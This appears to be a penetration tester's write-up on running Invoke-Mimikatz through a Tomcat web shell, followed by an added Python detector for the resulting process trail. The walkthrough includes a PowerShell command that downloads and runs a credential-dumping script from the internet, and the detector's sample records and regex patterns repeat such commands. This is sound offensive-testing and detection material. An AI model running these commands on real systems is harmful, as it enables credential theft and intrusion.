A while back I was messing around with Tomcat, and it got me thinking: when I come across Tomcat during assessments it is normally running as SYSTEM or some kind of admin account. Sometimes I don't want to, or can't, use Metasploit and I just have the web shell. I could create a user and log in that way, but one of the first things I would do is run Mimikatz, so why not just do it from the web shell? Nothing is really stopping you, so I compiled some commands that would let me run the Invoke-Mimikatz PowerShell cmdlet. Later I decided I should automate the commands in a JSP file going forward, and I did; it can be found here: https://player.vimeo.com/video/109617452
So here is a quick run through of what I was doing:
1. Determine the architecture, because if the system is x64 and Tomcat is x86, the PowerShell launched will be 32-bit and Invoke-Mimikatz won't work, since it can't read the 64-bit lsass process. The way I did this was a quick registry query; the command is:
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE
2. Find the appropriate install of PowerShell if it is a 64-bit system. According to multiple sources the 64-bit PowerShell should be at
but none of the systems I tested on had PowerShell there, so I had to go looking for it. After some poking around I noticed that on all of my 64-bit test systems there was a folder that started with
followed by hashes and version information that held the 64-bit PowerShell, which I could call. The command I use to find the PowerShell exe is:
dir /S %windir%\powershell.exe
3. After the appropriate PowerShell instance is found, I run the Invoke-Mimikatz.ps1 file by executing it after downloading it from either GitHub
or a local copy, if you can't reach external addresses, using:
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
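From the defender's side, the three steps above leave a recognisable process-creation trail: a web-server process (tomcat*.exe, or java.exe started with a catalina class path) spawning reg.exe, cmd.exe or powershell.exe, and a PowerShell command line that combines a download cradle (DownloadString), in-memory execution (IEX) and Invoke-Mimikatz. The Python script below is an added example, not code from the original post: it runs that detection logic over a handful of constructed Sysmon-style process-creation records. The image paths, command lines and the placeholder download host in the sample records are made up for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed Sysmon Event ID 1 style records (ParentImage, ParentCommandLine,
# Image, CommandLine). These are sample values written for this example, not
# logs from the original post; the download host is a placeholder.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Tomcat\bin\tomcat8.exe",
     "ParentCommandLine": r"tomcat8.exe //RS//Tomcat8",
     "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE'},
    {"ParentImage": r"C:\Program Files\Java\jre8\bin\java.exe",
     "ParentCommandLine": r'java.exe -Dcatalina.home="C:\Tomcat" org.apache.catalina.startup.Bootstrap start',
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir /S %windir%\powershell.exe"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "ParentCommandLine": r"cmd.exe /c powershell ...",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell \"IEX (New-Object Net.WebClient).DownloadString('https://placeholder.invalid/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds\""},
    {"ParentImage": r"C:\Windows\explorer.exe", "ParentCommandLine": "explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Get-ChildItem C:\Users"},  # benign admin use
    {"ParentImage": r"C:\Tomcat\bin\tomcat8.exe",
     "ParentCommandLine": r"tomcat8.exe //RS//Tomcat8",
     "Image": r"C:\Program Files\Java\jre8\bin\java.exe",
     "CommandLine": "java.exe org.apache.catalina.startup.Bootstrap start"},  # normal child
]

# Parent images that should never be spawning shells or registry tools.
WEB_SERVER_IMAGES = re.compile(r"(?:^|\\)(tomcat\d*|w3wp|httpd|nginx)\.exe$", re.IGNORECASE)
# Tomcat is often run directly by java.exe; treat java.exe as a web server only
# when its own command line references a servlet container.
JAVA_IMAGE = re.compile(r"(?:^|\\)javaw?\.exe$", re.IGNORECASE)
SERVLET_HINTS = re.compile(r"catalina|tomcat|jboss|wildfly", re.IGNORECASE)
SHELL_CHILDREN = re.compile(r"(?:^|\\)(cmd|powershell|pwsh|reg|whoami|net|wmic)\.exe$", re.IGNORECASE)

# Command-line indicators, checked regardless of process ancestry.
CRADLE_PATTERNS = {
    "download cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIWR\b", re.IGNORECASE),
    "in-memory execution": re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE),
    "credential dumping tool": re.compile(r"Invoke-Mimikatz|-DumpCreds|sekurlsa|lsass", re.IGNORECASE),
}


@dataclass
class Finding:
    index: int
    severity: str
    reasons: list = field(default_factory=list)


def is_web_server(parent_image, parent_cmdline):
    """True when the parent looks like a web/servlet server process."""
    if WEB_SERVER_IMAGES.search(parent_image):
        return True
    return bool(JAVA_IMAGE.search(parent_image) and SERVLET_HINTS.search(parent_cmdline))


def analyze_event(index, ev):
    """Return a Finding for one record, or None when nothing is suspicious."""
    reasons = []
    severity = None
    parent = ev.get("ParentImage", "")
    child = ev.get("Image", "")
    cmd = ev.get("CommandLine", "")
    if is_web_server(parent, ev.get("ParentCommandLine", "")) and SHELL_CHILDREN.search(child):
        reasons.append("web server process spawned " + child.rsplit("\\", 1)[-1])
        severity = "medium"
    for label, pattern in CRADLE_PATTERNS.items():
        if pattern.search(cmd):
            reasons.append(label)
    # A credential-dumping indicator, or cradle + in-memory execution together,
    # is high severity on its own; other command-line hits alone are low.
    if "credential dumping tool" in reasons or (
            "download cradle" in reasons and "in-memory execution" in reasons):
        severity = "high"
    elif reasons and severity is None:
        severity = "low"
    return Finding(index, severity, reasons) if reasons else None


def analyze(events):
    """Run the checks over a list of records and return the findings in order."""
    return [f for f in (analyze_event(i, e) for i, e in enumerate(events)) if f]


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(f"event {finding.index}: {finding.severity}: {'; '.join(finding.reasons)}")
```

The parent/child rule catches steps 1 and 2 (reg.exe and cmd.exe under Tomcat) even though their command lines are innocuous on their own, while the command-line rule catches step 3 even when the PowerShell process is one hop removed from the web server, as it is when it is launched via cmd.exe. The two benign records (an administrator's interactive PowerShell and Tomcat starting java.exe) produce no finding.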